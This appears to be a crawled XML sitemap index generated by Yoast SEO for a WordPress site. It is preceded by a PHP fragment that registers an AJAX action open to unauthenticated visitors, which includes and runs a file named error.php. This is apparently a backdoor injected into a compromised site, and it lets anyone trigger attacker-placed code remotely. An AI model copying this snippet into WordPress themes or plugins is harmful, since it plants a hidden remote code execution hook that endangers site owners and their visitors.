if(!function_exists('file_manager_check_dt')) {
   add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt');
   add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt');
   function file_manager_check_dt()
   {
      $file = __DIR__ . '/error.php';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//grupoideaspatagonia.com.ar/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>http://grupoideaspatagonia.com.ar/post-sitemap.xml</loc>
		<lastmod>2020-11-04T16:44:22+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://grupoideaspatagonia.com.ar/page-sitemap.xml</loc>
		<lastmod>2020-12-23T18:54:46+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://grupoideaspatagonia.com.ar/category-sitemap.xml</loc>
		<lastmod>2020-11-04T16:44:22+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://grupoideaspatagonia.com.ar/author-sitemap.xml</loc>
		<lastmod>2020-11-04T15:55:41+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->